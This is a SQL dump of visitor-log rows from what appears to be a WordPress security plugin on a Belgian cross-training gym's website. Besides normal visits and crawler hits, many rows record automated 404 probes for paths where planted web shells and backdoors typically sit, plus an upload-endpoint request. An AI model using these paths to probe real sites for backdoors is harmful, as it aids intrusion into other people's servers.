(74361, 1496436089.024448, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74362, 1496440621.746406, 621390105, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74363, 1496440978.939087, 629981398, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/security.php', 'http://crosstrainingcenter.be/wp-content/security.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74364, 1496440992.402769, 3569402886, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/etc.php', 'http://crosstrainingcenter.be/wp-content/plugins/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74365, 1496443717.087409, 1123631171, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74366, 1496443718.474457, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74367, 1496445236.418307, 1603019490, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74368, 1496447395.539241, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74369, 1496448806.026498, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74370, 1496448806.674161, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74371, 1496449481.309172, 844599431, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made1/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made1/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74372, 1496449789.230225, 2918037896, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/class-wp-contact.php', 'http://crosstrainingcenter.be/wp-includes/class-wp-contact.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74373, 1496451966.974415, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74374, 1496451967.421686, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74375, 1496453796.788938, 1123631300, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74376, 1496454555.324121, 3639891570, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/konzept/style.css', 'http://crosstrainingcenter.be/wp-content/themes/konzept/style.css', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(74377, 1496455752.878031, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(74378, 1496458420.611302, 629981398, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/kuma/db.php', 'http://crosstrainingcenter.be/wp-content/themes/kuma/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74379, 1496458565.807267, 1822917694, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/js_composer/vendor/composer/config.php', 'http://crosstrainingcenter.be/wp-content/plugins/js_composer/vendor/composer/config.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74380, 1496459312.310966, 3097104020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/security.php', 'http://crosstrainingcenter.be/wp-includes/security.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74381, 1496462618.769782, 1540278613, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/etc.php', 'http://crosstrainingcenter.be/wp-content/uploads/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74382, 1496465136.834126, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74383, 1496466884.846978, 784084240, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/kuma/figure.php', 'http://crosstrainingcenter.be/wp-content/themes/kuma/figure.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74384, 1496470458.832702, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74385, 1496471687.578849, 1538457750, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74386, 1496471689.449353, 1538457750, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74387, 1496471708.829023, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74388, 1496471725.221151, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(74389, 1496471728.652542, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74390, 1496471731.412677, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/content-wrapper.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/content-wrapper.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74391, 1496471731.415687, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74392, 1496471733.875052, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74393, 1496471741.469288, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74394, 1496471753.708265, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74395, 1496471852.259284, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74396, 1496472036.256916, 1428090969, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp_module/wp_msg.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp_module/wp_msg.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74397, 1496472155.353655, 1475089271, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/plugin/info.php', 'http://crosstrainingcenter.be/wp-content/plugins/plugin/info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74398, 1496472173.667993, 1538457750, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/en-images/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(74399, 1496474142.434178, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74400, 1496474143.165216, 2996488203, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74401, 1496479887.140412, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/etc.php', 'http://crosstrainingcenter.be/wp-content/etc.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74402, 1496479978.293330, 2915925356, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/clubblog/db.php', 'http://crosstrainingcenter.be/wp-content/themes/clubblog/db.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74403, 1496483267.107339, 1123631300, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74404, 1496485916.080598, 3652605758, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/jm-ajax/upload_file/', '', 'python-requests/2.17.3'),
(74405, 1496492064.029907, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74406, 1496492310.043855, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(74407, 1496492645.592071, 621375758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74408, 1496502757.865902, 1833311020, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-ajax-made/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74409, 1496506060.010294, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74410, 1496506060.670739, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74411, 1496506061.258037, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74412, 1496506061.750872, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74413, 1496506062.441260, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74414, 1496506062.980556, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74415, 1496506063.660457, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74416, 1496506064.176041, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74417, 1496506064.590760, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74418, 1496506065.040917, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74419, 1496506065.565043, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74420, 1496506080.200439, 1796538632, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(74421, 1496506080.705037, 1796538632, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)'),
(74422, 1496508183.284626, 2994779638, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-conde.php', 'http://crosstrainingcenter.be/wp-conde.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(74423, 1496508498.542460, 3024883598, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(74424, 1496512596.581382, 1426952777, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(74425, 1496518488.780590, 2509961569, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwi76taltaLUAhWOJlAKHYFbCsYQFghcMAg&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; MAARJS; rv:11.0) like Gecko'),
(74426, 1496518491.197263, 2509961569, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MAARJS; rv:11.0) like Gecko'),
(74427, 1496524320.113890, 1123633540, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74428, 1496524405.577836, 1539837082, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'),
(74429, 1496524693.950064, 2366148185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(74430, 1496527456.055001, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(74431, 1496527456.652773, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74432, 1496527457.522520, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74433, 1496527457.924437, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74434, 1496527458.407391, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74435, 1496527458.813067, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74436, 1496527459.220317, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74437, 1496527459.667286, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(74438, 1496527460.057175, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74439, 1496527460.451590, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74440, 1496527461.218355, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74441, 1496527461.797972, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74442, 1496527462.205596, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74443, 1496527462.621908, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(74444, 1496531442.907104, 1584253342, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://l.facebook.com/l.php?u=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&h=ATMCiN1_VR4ckpyeGlY1eJC-lGKtzk5ln3bC3heM0qy062QPCNahPwWb1YSpUozEzFaEA7YzgiF_ixRtGSrXtj2YMnQagFDvR7s', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/95.0.0.54.70;FBBV/59901094;FBDV/iPhone8,1;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(74445, 1496531449.417555, 1584253342, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Mobile/14F89 [FBAN/FBIOS;FBAV/95.0.0.54.70;FBBV/59901094;FBDV/iPhone8,1;FBMD/iPhone;FBSN/iOS;FBSV/10.3.2;FBSS/2;FBCR/OrangeB;FBID/phone;FBLC/fr_FR;FBOP/5;FBRV/0]'),
(74446, 1496535278.854570, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74447, 1496536229.630824, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74448, 1496538987.025265, 1338303090, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(74449, 1496542212.463038, 1123633540, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(74450, 1496551954.458852, 2303381358, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74451, 1496551969.345297, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(74452, 1496556611.513206, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(74453, 1496556612.076730, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74454, 1496556612.617011, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74455, 1496556613.184675, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74456, 1496556613.695368, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74457, 1496556614.267428, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74458, 1496556614.858747, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74459, 1496556615.303529, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74460, 1496556615.783100, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74461, 1496556616.227796, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74462, 1496556616.689334, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(74463, 1496572272.055687, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(74464, 1496572274.755654, 3233510666, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/ubh/up.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),
(74465, 1496578525.396366, 3475901867, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(74466, 1496590526.391802, 3325711418, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php.suspected', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php.suspected', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
